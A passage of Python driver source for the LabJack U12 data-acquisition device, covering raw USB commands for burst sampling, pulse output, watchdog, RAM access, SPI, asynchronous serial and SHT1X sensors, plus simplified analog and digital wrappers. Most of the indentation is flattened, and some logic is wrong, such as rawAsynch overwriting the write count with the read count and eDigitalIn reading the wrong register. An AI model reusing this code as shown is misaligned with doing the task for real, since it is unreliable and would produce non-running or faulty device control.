    command[6] = (binPWMA >> 2) & 0xff
    command[7] = (binPWMB >> 2) & 0xff
    self.write(command)
    results = self.read()
    # NOTE(review): unlike rawDIO/rawCounter, this response byte 0 is not
    # validated against the command code -- presumably intentional; confirm
    # against Section 5.4 of the User's Guide.
    returnDict = {}
    returnDict['D15toD8States'] = BitField(results[1], "D", range(15, 7, -1), "Low", "High")
    returnDict['D7toD0States'] = BitField(results[2], "D", range(7, -1, -1), "Low", "High")
    returnDict['IO3toIO0States'] = BitField((results[3] >> 4), "IO", range(3, -1, -1), "Low", "High")
    # Counter is a 32-bit big-endian value in response bytes 4-7.
    counter = results[7]
    counter += results[6] << 8
    counter += results[5] << 16
    counter += results[4] << 24
    returnDict['Counter'] = counter
    return returnDict
def rawAIBurst(self, channel0PGAMUX = 8, channel1PGAMUX = 9, channel2PGAMUX = 10, channel3PGAMUX = 11, NumberOfScans = 8, TriggerIONum = 0, TriggerState = 0, UpdateIO = False, LEDState = True, IO3ToIO0States = 0, FeatureReports = False, TriggerOn = False, SampleInterval = 15000):
"""
Name: U12.rawAIBurst( channel0PGAMUX = 8, channel1PGAMUX = 9,
channel2PGAMUX = 10, channel3PGAMUX = 11,
NumberOfScans = 8, TriggerIONum = 0,
TriggerState = 0, UpdateIO = False,
LEDState = True, IO3ToIO0States = 0,
FeatureReports = False, TriggerOn = False,
SampleInterval = 15000 )
Args: channel0PGAMUX, A byte that contains channel0 information
channel1PGAMUX, A byte that contains channel1 information
channel2PGAMUX, A byte that contains channel2 information
channel3PGAMUX, A byte that contains channel3 information
NumberOfScans, The number of scans you wish to take. Rounded up
to a power of 2.
TriggerIONum, IO to trigger burst on.
TriggerState, State to trigger on.
UpdateIO, True if you want to update the IO/D line. False to
False to just read their values.
LEDState, Turns the status LED on or off.
IO3ToIO0States, 4 bits for IO3-0 states
FeatureReports, Use feature reports, or not.
TriggerOn, Use trigger to start acquisition.
SampleInterval, = int(6000000.0/(ScanRate * NumberOfChannels))
must be greater than (or equal to) 733.
Desc: After receiving a AIBurst command, the LabJack collects 4
channels at the specified data rate, and puts data in the buffer.
This continues until the buffer is full, at which time the
LabJack starts sending the data to the host. Data is sent to the
host 1 scan at a time while checking for a command from the host.
If a command is received the burst operation is canceled and the
command is executed normally. If the LED is enabled, it blinks at
4 Hz while waiting for a trigger, is off during acquisition,
blinks at about 8 Hz during data delivery, and is set on when
done or stopped. See Section 5.5 of the User's Guide.
This function sends the AIBurst command, then reads all the
responses. Separating the write and read is not currently
supported (like in the UW driver).
By default, it does single-ended readings on AI0-4 at 100Hz for 8
scans.
Returns: A dictionary with the following keys:
Channel0-3, A list of the readings on the channels
PGAOvervoltages, A list of the over-voltage flags
IO3toIO0State, A list of the IO states
IterationCounters, A list of the values of the iteration counter
Backlogs, value*256 = number of packets in the backlog.
BufferOverflowOrChecksumErrors, If True and Backlog = 31,
then a buffer overflow occurred. If
True and Backlog = 0, then Checksum
error occurred.
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawAIBurst()
{
'Channel0': [1.484375, 1.513671875, ... , 1.46484375],
'Channel1': [1.455078125, 1.455078125, ... , 1.455078125],
'Channel2': [1.46484375, 1.474609375, ... , 1.46484375],
'Channel3': [1.435546875, 1.42578125, ... , 1.435546875],
'PGAOvervoltages': [False, False, ..., False],
'IO3toIO0States':
[<BitField object: [ IO3 = Low (0), IO2 = Low (0), IO1 = Low (0),
IO0 = Low (0) ] >, ... ],
'IterationCounters': [0, 1, 2, 3, 4, 5, 6, 0],
'Backlogs': [0, 0, 0, 0, 0, 0, 0, 0],
'BufferOverflowOrChecksumErrors': [False, False, ... , False]
}
"""
command = [ 0 ] * 8
# Bits 6-4: PGA for 1st Channel
# Bits 3-0: MUX command for 1st Channel
command[0] = int(channel0PGAMUX)
tempNum = command[0] & 7 # 7 = 0b111
channel0Number = tempNum if (command[0] & 0xf) > 7 else tempNum+8
channel0Gain = (command[0] >> 4) & 7 # 7 = 0b111
command[1] = int(channel1PGAMUX)
tempNum = command[1] & 7 # 7 = 0b111
channel1Number = tempNum if (command[1] & 0xf) > 7 else tempNum+8
channel1Gain = (command[1] >> 4) & 7 # 7 = 0b111
command[2] = int(channel2PGAMUX)
tempNum = command[2] & 7 # 7 = 0b111
channel2Number = tempNum if (command[2] & 0xf) > 7 else tempNum+8
channel2Gain = (command[2] >> 4) & 7 # 7 = 0b111
command[3] = int(channel3PGAMUX)
tempNum = command[3] & 7 # 7 = 0b111
channel3Number = tempNum if (command[3] & 0xf) > 7 else tempNum+8
channel3Gain = (command[3] >> 4) & 7 # 7 = 0b111
if NumberOfScans > 1024 or NumberOfScans < 8:
raise U12Exception("The number of scans must be between 1024 and 8 (inclusive)")
NumScansExponentMod = 10 - int(math.ceil(math.log(NumberOfScans, 2)))
NumScans = 2 ** (10 - NumScansExponentMod)
bf = BitField( rawByte = (NumScansExponentMod << 5) )
# bits 4-3: IO to Trigger on
bf.bit2 = 0
bf.bit1 = int(bool(UpdateIO))
bf.bit0 = int(bool(LEDState))
command[4] = int(bf)
bf2 = BitField(rawByte = int(IO3ToIO0States))
#Bits 7-4: 1010 (Start Burst)
bf2.bit7 = 1
bf2.bit5 = 1
command[5] = int(bf2)
if SampleInterval < 733:
raise U12Exception("SampleInterval must be greater than 733.")
bf3 = BitField( rawByte = ((SampleInterval >> 8) & 0xf) )
bf3.bit7 = int(bool(FeatureReports))
bf3.bit6 = int(bool(TriggerOn))
command[6] = int(bf3)
command[7] = SampleInterval & 0xff
self.write(command)
resultsList = []
for i in range(NumScans):
resultsList.append(self.read())
returnDict = {}
returnDict['BufferOverflowOrChecksumErrors'] = list()
returnDict['PGAOvervoltages'] = list()
returnDict['IO3toIO0States'] = list()
returnDict['IterationCounters'] = list()
returnDict['Backlogs'] = list()
returnDict['Channel0'] = list()
returnDict['Channel1'] = list()
returnDict['Channel2'] = list()
returnDict['Channel3'] = list()
for results in resultsList:
bf = BitField(rawByte = results[0])
if bf.bit7 != 1 or bf.bit6 != 0:
raise U12Exception("Expected a AIBurst response, got %s instead." % results[0])
returnDict['BufferOverflowOrChecksumErrors'].append(bool(bf.bit5))
returnDict['PGAOvervoltages'].append(bool(bf.bit4))
returnDict['IO3toIO0States'].append(BitField(results[0], "IO", range(3, -1, -1), "Low", "High"))
returnDict['IterationCounters'].append((results[1] >> 5))
returnDict['Backlogs'].append(results[1] & 0xf)
channel0 = (results[2] >> 4) & 0xf
channel1 = (results[2] & 0xf)
channel2 = (results[5] >> 4) & 0xf
channel3 = (results[5] & 0xf)
channel0 = (channel0 << 8) + results[3]
returnDict['Channel0'].append(self.bitsToVolts(channel0Number, channel0Gain, channel0))
channel1 = (channel1 << 8) + results[4]
returnDict['Channel1'].append(self.bitsToVolts(channel1Number, channel1Gain, channel1))
channel2 = (channel2 << 8) + results[6]
returnDict['Channel2'].append(self.bitsToVolts(channel2Number, channel2Gain, channel2))
channel3 = (channel3 << 8) + results[7]
returnDict['Channel3'].append(self.bitsToVolts(channel3Number, channel3Gain, channel3))
return returnDict
def rawAIContinuous(self, channel0PGAMUX = 8, channel1PGAMUX = 9, channel2PGAMUX = 10, channel3PGAMUX = 11, FeatureReports = False, CounterRead = False, UpdateIO = False, LEDState = True, IO3ToIO0States = 0, SampleInterval = 15000):
"""
Currently in development.
The function is mostly implemented, but is currently too slow to be
useful.
"""
command = [ 0 ] * 8
# Bits 6-4: PGA for 1st Channel
# Bits 3-0: MUX command for 1st Channel
command[0] = int(channel0PGAMUX)
tempNum = command[0] & 7 # 7 = 0b111
channel0Number = tempNum if (command[0] & 0xf) > 7 else tempNum+8
channel0Gain = (command[0] >> 4) & 7 # 7 = 0b111
command[1] = int(channel1PGAMUX)
tempNum = command[1] & 7 # 7 = 0b111
channel1Number = tempNum if (command[1] & 0xf) > 7 else tempNum+8
channel1Gain = (command[1] >> 4) & 7 # 7 = 0b111
command[2] = int(channel2PGAMUX)
tempNum = command[2] & 7 # 7 = 0b111
channel2Number = tempNum if (command[2] & 0xf) > 7 else tempNum+8
channel2Gain = (command[2] >> 4) & 7 # 7 = 0b111
command[3] = int(channel3PGAMUX)
tempNum = command[3] & 7 # 7 = 0b111
channel3Number = tempNum if (command[3] & 0xf) > 7 else tempNum+8
channel3Gain = (command[3] >> 4) & 7 # 7 = 0b111
bf = BitField()
bf.bit7 = int(bool(FeatureReports))
bf.bit6 = int(bool(CounterRead))
bf.bit1 = int(bool(UpdateIO))
bf.bit0 = int(bool(LEDState))
command[4] = int(bf)
# Bits 7-4: 1001 (Start Continuous)
bf2 = BitField( rawByte = int(IO3ToIO0States) )
bf2.bit7 = 1
bf2.bit4 = 1
command[5] = int(bf2)
command[6] = ( SampleInterval >> 8)
command[7] = SampleInterval & 0xff
byte0bf = BitField()
returnDict = dict()
self.write(command)
while True:
results = self.read()
byte0bf.fromByte(results[0])
returnDict['Byte0'] = byte0bf
returnDict['IterationCounter'] = (results[1] >> 5)
returnDict['Backlog'] = results[1] & 0xf
yield returnDict
def rawPulseout(self, B1 = 10, C1 = 2, B2 = 10, C2 = 2, D7ToD0PulseSelection = 1, ClearFirst = False, NumberOfPulses = 5):
"""
Name: U12.rawPulseout( B1 = 10, C1 = 2, B2 = 10, C2 = 2,
D7ToD0PulseSelection = 1, ClearFirst = False,
NumberOfPulses = 5)
Args: B1, the B component of the first half cycle
C1, the C component of the first half cycle
B2, the B component of the second half cycle
C2, the C component of the second half cycle
D7ToD0PulseSelection, which D lines to pulse.
ClearFirst, True = Start Low.
NumberOfPulses, the number of pulses
Desc: This command creates pulses on any, or all, of D0-D7. The desired
D lines must be set to output with some other function. See
Section 5.7 of the User's Guide.
By default, pulses D0 5 times at 400us high, then 400 us low.
Returns: None
Example:
Have a jumper wire connected from D0 to CNT.
>>> import u12
>>> d = u12.U12()
>>> d.rawDIO(D7toD0Directions = 0, UpdateDigital = True)
>>> d.rawCounter(ResetCounter = True)
>>> d.rawPulseout(ClearFirst = True)
>>> print d.rawCounter()
{ 'IO3toIO0States': ... ,
'Counter': 5,
'D7toD0States': ... ,
'D15toD8States': ...
}
"""
command = [ 0 ] * 8
command[0] = B1
command[1] = C1
command[2] = B2
command[3] = C2
command[4] = int(D7ToD0PulseSelection)
# 01100100 (Pulseout)
bf = BitField()
bf.bit6 = 1
bf.bit5 = 1
bf.bit2 = 1
command[5] = int(bf)
bf2 = BitField( rawByte = ( NumberOfPulses >> 8 ) )
bf2.bit7 = int(bool(ClearFirst))
command[6] = int(bf2)
command[7] = NumberOfPulses & 0xff
self.write(command)
results = self.read()
if command[5] != results[5]:
raise U12Exception("Expected Pulseout response, got %s instead." % results[5])
if results[4] != 0:
errors = BitField(rawByte = command[4], labelPrefix = "D", zeroLabel = "Ok", oneLabel = "Error")
raise U12Exception("D7-D0 Direction error detected: %s" % errors)
return None
def rawReset(self):
"""
Name: U12.rawReset()
Desc: Sits in an infinite loop until micro watchdog timeout after about
2 seconds. See Section 5.8 of the User's Guide.
Note: The function will close the device after it has written the
command.
Returns: None
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawReset()
"""
command = [ 0 ] * 8
# 0b01011111 ( Reset )
bf = BitField()
bf.bit6 = 1
bf.bit4 = 1
bf.bit3 = 1
bf.bit2 = 1
bf.bit1 = 1
bf.bit0 = 1
command[5] = int(bf)
self.write(command)
self.close()
def rawReenumerate(self):
"""
Name: U12.rawReenumerate()
Desc: Detaches from the USB, reloads config parameters, and then
reattaches so the device can be re-enumerated. See Section 5.9 of
the User's Guide.
Note: The function will close the device after it has written the
command.
Returns: None
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawReenumerate()
"""
command = [ 0 ] * 8
# 0b01000000 (Re-Enumerate)
bf = BitField()
bf.bit6 = 1
command[5] = int(bf)
self.write(command)
self.close()
def rawWatchdog(self, IgnoreCommands = False, D0Active = False, D0State = False, D1Active = False, D1State = False, D8Active = False, D8State = False, ResetOnTimeout = False, WatchdogActive = False, Timeout = 60):
"""
Name: U12.rawWatchdog( IgnoreCommands = False, D0Active = False,
D0State = False, D1Active = False,
D1State = False, D8Active = False,
D8State = False, ResetOnTimeout = False,
WatchdogActive = False, Timeout = 60)
Desc: Sets the settings for the watchdog, or just reads the firmware
version of the U12. See section 5.10 of the User's Guide.
By defaults, just reads the firmware version.
Returns: A dictionary with the following keys:
FirmwareVersion, the firmware version of the U12.
Example:
>>> import u12
>>> d = u12.U12()
>>> print d.rawWatchdog()
{'FirmwareVersion': '1.10'}
"""
command = [ 0 ] * 8
command[0] = int(bool(IgnoreCommands))
bf = BitField()
bf.bit7 = int(D0Active)
bf.bit6 = int(D0State)
bf.bit5 = int(D1Active)
bf.bit4 = int(D1State)
bf.bit3 = int(D8Active)
bf.bit2 = int(D8State)
bf.bit1 = int(ResetOnTimeout)
bf.bit0 = int(WatchdogActive)
command[4] = int(bf)
# 01X1X011 (Watchdog)
bf2 = BitField()
bf2.bit6 = 1
bf2.bit4 = 1
bf2.bit1 = 1
bf2.bit0 = 1
command[5] = int(bf2)
# Timeout is increments of 2^16 cycles.
# 2^16 cycles is about 0.01 seconds.
binTimeout = int((float(Timeout) / 0.01))
command[6] = ( binTimeout >> 8 ) & 0xff
command[7] = binTimeout & 0xff
self.write(command)
results = self.read()
returnDict = dict()
returnDict['FirmwareVersion'] = "%s.%.2d" % (results[0], results[1])
return returnDict
def rawReadRAM(self, Address = 0):
"""
Name: U12.rawReadRAM(Address = 0)
Args: Address, the starting address to read from
Desc: Reads 4 bytes out of the U12's internal memory. See section 5.11
of the User's Guide.
By default, reads the bytes that make up the serial number.
Returns: A dictionary with the following keys:
DataByte0, the data byte at Address - 0
DataByte1, the data byte at Address - 1
DataByte2, the data byte at Address - 2
DataByte3, the data byte at Address - 3
Example:
>>> import u12, struct
>>> d = u12.U12()
>>> r = d.rawReadRAM()
>>> print r
{'DataByte3': 5, 'DataByte2': 246, 'DataByte1': 139, 'DataByte0': 170}
>>> bytes = [ r['DataByte3'], r['DataByte2'], r['DataByte1'], r['DataByte0'] ]
>>> print struct.unpack(">I", struct.pack("BBBB", *bytes))[0]
100043690
"""
command = [ 0 ] * 8
# 01010000 (Read RAM)
bf = BitField()
bf.bit6 = 1
bf.bit4 = 1
command[5] = int(bf)
command[6] = (Address >> 8) & 0xff
command[7] = Address & 0xff
self.write(command)
results = self.read()
if results[0] != int(bf):
raise U12Exception("Expected ReadRAM response, got %s" % results[0])
if (results[6] != command[6]) or (results[7] != command[7]):
receivedAddress = (results[6] << 8) + results[7]
raise U12Exception("Wanted address %s got address %s" % (Address, receivedAddress))
returnDict = dict()
returnDict['DataByte3'] = results[1]
returnDict['DataByte2'] = results[2]
returnDict['DataByte1'] = results[3]
returnDict['DataByte0'] = results[4]
return returnDict
def rawWriteRAM(self, Data, Address):
"""
Name: U12.rawWriteRAM(Data, Address)
Args: Data, a list of 4 bytes to write to memory.
Address, the starting address to write to.
Desc: Writes 4 bytes to the U12's internal memory. See section 5.13 of
the User's Guide.
No default behavior, you must pass Data and Address.
Returns: A dictionary with the following keys:
DataByte0, the data byte at Address - 0
DataByte1, the data byte at Address - 1
DataByte2, the data byte at Address - 2
DataByte3, the data byte at Address - 3
Example:
>>> import u12
>>> d = u12.U12()
>>> print d.rawWriteRAM([1, 2, 3, 4], 0x200)
{'DataByte3': 4, 'DataByte2': 3, 'DataByte1': 2, 'DataByte0': 1}
"""
command = [ 0 ] * 8
if not isinstance(Data, list) or len(Data) > 4:
raise U12Exception("Data wasn't a list, or was too long.")
Data.reverse()
command[:len(Data)] = Data
# 01010001 (Write RAM)
bf = BitField()
bf.bit6 = 1
bf.bit4 = 1
bf.bit0 = 1
command[5] = int(bf)
command[6] = (Address >> 8) & 0xff
command[7] = Address & 0xff
self.write(command)
results = self.read()
if results[0] != int(bf):
raise U12Exception("Expected ReadRAM response, got %s" % results[0])
if (results[6] != command[6]) or (results[7] != command[7]):
receivedAddress = (results[6] << 8) + results[7]
raise U12Exception("Wanted address %s got address %s" % (Address, receivedAddress))
returnDict = dict()
returnDict['DataByte3'] = results[1]
returnDict['DataByte2'] = results[2]
returnDict['DataByte1'] = results[3]
returnDict['DataByte0'] = results[4]
return returnDict
def rawAsynch(self, Data, AddDelay = False, TimeoutActive = False, SetTransmitEnable = False, PortB = False, NumberOfBytesToWrite = 0, NumberOfBytesToRead = 0):
"""
Name: U12.rawAsynch(Data, AddDelay = False, TimeoutActive = False,
SetTransmitEnable = False, PortB = False,
NumberOfBytesToWrite = 0, NumberOfBytesToRead = 0)
Args: Data, A list of bytes to write.
AddDelay, True to add a 1 bit delay between each transmit byte.
TimeoutActive, True to enable timeout for the receive phase.
SetTransmitEnable, True to set Transmit Enable to high during
transmit and low during receive.
PortB, True to use PortB instead of PortA.
NumberOfBytesToWrite, Number of bytes to write.
NumberOfBytesToRead, Number of bytes to read.
Desc: Requires firmware V1.1 or higher. This function writes and then
reads half-duplex asynchronous data on 1 of two pairs of D lines.
See section 5.13 of the User's Guide.
Returns: A dictionary with the following keys,
DataByte0-3, the first four data bytes read over the RX line
ErrorFlags, a BitField representing the error flags.
Example:
>>> import u12
>>> d = u12.U12()
>>> # Set the full and half A,B,C to 9600
>>> d.rawWriteRAM([0, 1, 1, 200], 0x073)
>>> d.rawWriteRAM([5, 1, 2, 48], 0x076)
>>> print d.rawAsynch([1, 2, 3, 4], NumberOfBytesToWrite = 4, NumberOfBytesToRead = 4)
{
'DataByte3': 4,
'DataByte2': 3,
'DataByte1': 2,
'DataByte0': 1,
'ErrorFlags': <BitField object: [ Timeout Error Flag = 0 (0), ... ] >
}
"""
command = [ 0 ] * 8
if not isinstance(Data, list) or len(Data) > 4:
raise U12Exception("Data wasn't a list, or was too long.")
NumberOfBytesToWrite = NumberOfBytesToRead & 0xff
NumberOfBytesToRead = NumberOfBytesToRead & 0xff
if NumberOfBytesToWrite > 18:
raise U12Exception("Can only write 18 or fewer bytes at a time.")
if NumberOfBytesToRead > 18:
raise U12Exception("Can only read 18 or fewer bytes at a time.")
Data.reverse()
command[:len(Data)] = Data
bf = BitField()
bf.bit3 = int(bool(AddDelay))
bf.bit2 = int(bool(TimeoutActive))
bf.bit1 = int(bool(SetTransmitEnable))
bf.bit0 = int(bool(PortB))
command[4] = int(bf)
#01100001 (Asynch)
bf2 = BitField()
bf2.bit6 = 1
bf2.bit5 = 1
bf2.bit0 = 1
command[5] = int(bf2)
command[6] = NumberOfBytesToWrite
command[7] = NumberOfBytesToRead
self.write(command)
results = self.read()
if command[5] != results[5]:
raise U12Exception("Expected Asynch response, got %s instead." % results[5])
returnDict = dict()
returnDict['DataByte3'] = results[0]
returnDict['DataByte2'] = results[1]
returnDict['DataByte1'] = results[2]
returnDict['DataByte0'] = results[3]
bfLabels = ["Timeout Error Flag", "STRT Error Flag", "FRM Error Flag", "RXTris Error Flag", "TETris Error Flag", "TXTris Error Flag"]
bf = BitField( rawByte = results[4], labelPrefix = "", labelList = bfLabels )
returnDict["ErrorFlags"] = bf
return returnDict
SPIModes = ['A', 'B', 'C', 'D']
def rawSPI(self, Data, AddMsDelay = False, AddHundredUsDelay = False, SPIMode = 'A', NumberOfBytesToWriteRead = 0, ControlCS = False, StateOfActiveCS = False, CSLineNumber = 0):
"""
Name: U12.rawSPI( Data, AddMsDelay = False, AddHundredUsDelay = False,
SPIMode = 'A', NumberOfBytesToWriteRead = 0,
ControlCS = False, StateOfActiveCS = False,
CSLineNumber = 0)
Args: Data, A list of four bytes to write using SPI
AddMsDelay, If True, a 1 ms delay is added between each bit
AddHundredUsDelay, if True, 100us delay is added
SPIMode, 'A', 'B', 'C', or 'D'
NumberOfBytesToWriteRead, number of bytes to write and read.
ControlCS, D0-D7 is automatically controlled as CS. The state and
direction of CS is only tested if control is enabled.
StateOfActiveCS, Active state for CS line.
CSLineNumber, D line to use as CS if enabled (0-7).
Desc: This function performs SPI communication. See Section 5.14 of the
User's Guide.
Returns: A dictionary with the following keys,
DataByte0-3, the first four data bytes read
ErrorFlags, a BitField representing the error flags.
Example:
>>> import u12
>>> d = u12.U12()
>>> d.rawSPI([1,2,3,4], NumberOfBytesToWriteRead = 4)
{
'DataByte3': 4,
'DataByte2': 3,
'DataByte1': 2,
'DataByte0': 1,
'ErrorFlags':
<BitField object: [ CSStateTris Error Flag = 0 (0), ... ] >
}
"""
command = [ 0 ] * 8
if not isinstance(Data, list) or len(Data) > 4:
raise U12Exception("Data wasn't a list, or was too long.")
NumberOfBytesToWriteRead = NumberOfBytesToWriteRead & 0xff
if NumberOfBytesToWriteRead == 0:
NumberOfBytesToWriteRead = len(Data)
if NumberOfBytesToWriteRead > 18 or NumberOfBytesToWriteRead < 1:
raise U12Exception("Can only read/write 1 to 18 bytes at a time.")
Data.reverse()
command[:len(Data)] = Data
bf = BitField()
bf.bit7 = int(bool(AddMsDelay))
bf.bit6 = int(bool(AddHundredUsDelay))
modeIndex = self.SPIModes.index(SPIMode)
bf[7-modeIndex] = 1
command[4] = int(bf)
# 01100010 (SPI)
bf2 = BitField()
bf2.bit6 = 1
bf2.bit5 = 1
bf2.bit1 = 1
command[5] = int(bf2)
command[6] = NumberOfBytesToWriteRead
bf3 = BitField(rawByte = CSLineNumber)
bf3.bit7 = int(bool(ControlCS))
bf3.bit6 = int(bool(StateOfActiveCS))
command[7] = int(bf3)
self.write(command)
results = self.read()
if results[5] != command[5]:
raise U12Exception("Expected SPI response, got %s instead." % results[5])
returnDict = dict()
returnDict['DataByte3'] = results[0]
returnDict['DataByte2'] = results[1]
returnDict['DataByte1'] = results[2]
returnDict['DataByte0'] = results[3]
bfLabels = ["CSStateTris Error Flag", "SCKTris Error Flag", "MISOTris Error Flag", "MOSITris Error Flag"]
bf = BitField( rawByte = results[4], labelPrefix = "", labelList = bfLabels )
returnDict["ErrorFlags"] = bf
return returnDict
def rawSHT1X(self, Data = [3,0,0,0], WaitForMeasurementReady = True, IssueSerialReset = False, Add1MsDelay = False, Add300UsDelay = False, IO3State = 1, IO2State = 1, IO3Direction = 1, IO2Direction = 1, NumberOfBytesToWrite = 1, NumberOfBytesToRead = 3):
"""
Name: U12.rawSHT1X( Data = [3, 0, 0, 0],
WaitForMeasurementReady = True,
IssueSerialReset = False, Add1MsDelay = False,
Add300UsDelay = False, IO3State = 1, IO2State = 1,
IO3Direction = 1, IO2Direction = 1,
NumberOfBytesToWrite = 1, NumberOfBytesToRead = 3)
Args: Data, a list of bytes to write to the SHT.
WaitForMeasurementReady, Wait for the measurement ready signal.
IssueSerialReset, perform a serial reset
Add1MsDelay, adds 1ms delay
Add300UsDelay, adds a 300us delay
IO3State, sets the state of IO3
IO2State, sets the state of IO2
IO3Direction, sets the direction of IO3 ( 1 = Output )
IO2Direction, sets the direction of IO3 ( 1 = Output )
NumberOfBytesToWrite, how many bytes to write
NumberOfBytesToRead, how may bytes to read back
Desc: Sends and receives data from a SHT1X T/RH sensor from Sensirion.
See Section 5.15 of the User's Guide.
By default, reads the temperature from the SHT.
Returns: A dictionary with the following keys,
DataByte0-3, the four data bytes read
ErrorFlags, a BitField representing the error flags.
Example:
Uses an EI-1050 Temp/Humidity probe wired as follows:
Data ( Green ) -> IO0
Clock ( White ) -> IO1
Ground ( Black ) -> GND
Power ( Red ) -> +5V
Enable ( Brown ) -> IO2
>>> import u12
>>> d = u12.U12()
>>> results = d.rawSHT1X()
>>> print results
{
'DataByte3': 0,
'DataByte2': 69,
'DataByte1': 48,
'DataByte0': 25,
'ErrorFlags':
<BitField object: [ Serial Reset Error Flag = 0 (0), ... ] >
}
>>> tempC = (results['DataByte0'] * 256 ) + results['DataByte1']
>>> tempC = (tempC * 0.01) - 40
>>> print tempC
24.48
>>> results = d.rawSHT1X(Data = [5,0,0,0])
>>> print results
{
'DataByte3': 0,
'DataByte2': 200,
'DataByte1': 90,
'DataByte0': 2,
'ErrorFlags':
<BitField object: [ Serial Reset Error Flag = 0 (0), ... ] >
}
>>> sorh = (results['DataByte0'] * 256 ) + results['DataByte1']
>>> rhlinear = (-0.0000028*sorh*sorh)+(0.0405*sorh)-4.0
>>> rh = ((tempC-25.0)*(0.01+(0.00008*sorh)))+rhlinear
>>> print rh
19.3360256
"""
command = [ 0 ] * 8
if NumberOfBytesToWrite != 0:
if not isinstance(Data, list) or len(Data) > 4:
raise U12Exception("Data wasn't a list, or was too long.")
Data.reverse()
command[:len(Data)] = Data
if max(NumberOfBytesToWrite, NumberOfBytesToRead) > 4:
raise U12Exception("Can only read/write up to 4 bytes at a time.")
bf = BitField()
bf.bit7 = int(bool(WaitForMeasurementReady))
bf.bit6 = int(bool(IssueSerialReset))
bf.bit5 = int(bool(Add1MsDelay))
bf.bit4 = int(bool(Add300UsDelay))
bf.bit3 = int(bool(IO3State))
bf.bit2 = int(bool(IO2State))
bf.bit1 = int(bool(IO3Direction))
bf.bit0 = int(bool(IO2Direction))
command[4] = int(bf)
# 01101000 (SHT1X)
bf2 = BitField()
bf2.bit6 = 1
bf2.bit5 = 1
bf2.bit3 = 1
command[5] = int(bf2)
command[6] = NumberOfBytesToWrite
command[7] = NumberOfBytesToRead
self.write(command)
results = self.read()
if results[5] != command[5]:
raise U12Exception("Expected SHT1x response, got %s instead." % results[5])
returnDict = dict()
returnDict['DataByte3'] = results[0]
returnDict['DataByte2'] = results[1]
returnDict['DataByte1'] = results[2]
returnDict['DataByte0'] = results[3]
bfLabels = ["Serial Reset Error Flag", "Measurement Ready Error Flag", "Ack Error Flag"]
bf = BitField( rawByte = results[4], labelPrefix = "", labelList = bfLabels )
returnDict["ErrorFlags"] = bf
return returnDict
def eAnalogIn(self, channel, idNum = None, demo=0, gain=0):
"""
Name: U12.eAnalogIn(channel, idNum = None, demo=0, gain=0)
Args: See section 4.1 of the User's Guide
Desc: This is a simplified version of AISample. Reads the voltage from 1 analog input
>>> import u12
>>> d = u12.U12()
>>> d.eAnalogIn(0)
{'overVoltage': 0, 'idnum': 1, 'voltage': 1.435546875}
"""
if idNum is None:
idNum = self.id
if ON_WINDOWS:
ljid = ctypes.c_long(idNum)
ad0 = ctypes.c_long(999)
ad1 = ctypes.c_float(999)
ecode = staticLib.EAnalogIn(ctypes.byref(ljid), demo, channel, gain, ctypes.byref(ad0), ctypes.byref(ad1))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":ljid.value, "overVoltage":ad0.value, "voltage":ad1.value}
else:
# Bits 6-4: PGA for 1st Channel
# Bits 3-0: MUX command for 1st Channel
channel0PGAMUX = ( ( gain & 7 ) << 4)
channel0PGAMUX += channel-8 if channel > 7 else channel+8
results = self.rawAISample(channel0PGAMUX = channel0PGAMUX)
return {"idnum" : self.id, "overVoltage" : int(results['PGAOvervoltage']), 'voltage' : results['Channel0']}
def eAnalogOut(self, analogOut0, analogOut1, idNum = None, demo=0):
"""
Name: U12.eAnalogOut(analogOut0, analogOut1, idNum = None, demo=0)
Args: See section 4.2 of the User's Guide
Desc: This is a simplified version of AOUpdate. Sets the voltage of both analog outputs.
>>> import u12
>>> d = u12.U12()
>>> d.eAnalogOut(2, 2)
{'idnum': 1}
"""
if idNum is None:
idNum = self.id
if ON_WINDOWS:
ljid = ctypes.c_long(idNum)
ecode = staticLib.EAnalogOut(ctypes.byref(ljid), demo, ctypes.c_float(analogOut0), ctypes.c_float(analogOut1))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":ljid.value}
else:
if analogOut0 < 0:
analogOut0 = self.pwmAVoltage
if analogOut1 < 0:
analogOut1 = self.pwmBVoltage
self.rawCounterPWMDIO(PWMA = analogOut0, PWMB = analogOut1)
self.pwmAVoltage = analogOut0
self.pwmBVoltage = analogOut1
return {"idnum": self.id}
def eCount(self, idNum = None, demo = 0, resetCounter = 0):
"""
Name: U12.eCount(idNum = None, demo = 0, resetCounter = 0)
Args: See section 4.3 of the User's Guide
Desc: This is a simplified version of Counter. Reads & resets the counter (CNT).
>>> import u12
>>> d = u12.U12()
>>> d.eCount()
{'count': 1383596032.0, 'ms': 251487257.0}
"""
# Check id num
if idNum is None:
idNum = self.id
if ON_WINDOWS:
ljid = ctypes.c_long(idNum)
count = ctypes.c_double()
ms = ctypes.c_double()
ecode = staticLib.ECount(ctypes.byref(ljid), demo, resetCounter, ctypes.byref(count), ctypes.byref(ms))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":ljid.value, "count":count.value, "ms":ms.value}
else:
results = self.rawCounter( ResetCounter = resetCounter)
return {"idnum":self.id, "count":results['Counter'], "ms": (time() * 1000)}
def eDigitalIn(self, channel, idNum = None, demo = 0, readD=0):
"""
Name: U12.eDigitalIn(channel, idNum = None, demo = 0, readD=0)
Args: See section 4.4 of the User's Guide
Desc: This is a simplified version of DigitalIO that reads the state of
one digital input. Also configures the requested pin to input and
leaves it that way.
>>> import u12
>>> d = u12.U12()
>>> d.eDigitalIn(0)
{'state': 0, 'idnum': 1}
"""
# Check id num
if idNum is None:
idNum = self.id
if ON_WINDOWS:
ljid = ctypes.c_long(idNum)
state = ctypes.c_long(999)
ecode = staticLib.EDigitalIn(ctypes.byref(ljid), demo, channel, readD, ctypes.byref(state))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":ljid.value, "state":state.value}
else:
oldstate = self.rawDIO()
if readD:
if channel > 7:
channel = channel-7
direction = BitField(rawByte = oldstate['D15toD8Directions'])
direction[7-channel] = 1
results = self.rawDIO(D15toD8Directions = direction, UpdateDigital = True)
state = results["D15toD8States"][7-channel]
else:
direction = BitField(rawByte = oldstate['D7toD0Directions'])
direction[7-channel] = 1
results = self.rawDIO(D7ToD0Directions = direction, UpdateDigital = True)
state = results["D15toD8States"][7-channel]
else:
results = self.rawDIO(IO3toIO0DirectionsAndStates = 255, UpdateDigital = True)
state = results["IO3toIO0States"][3-channel]
return {"idnum" : self.id, "state" : state}
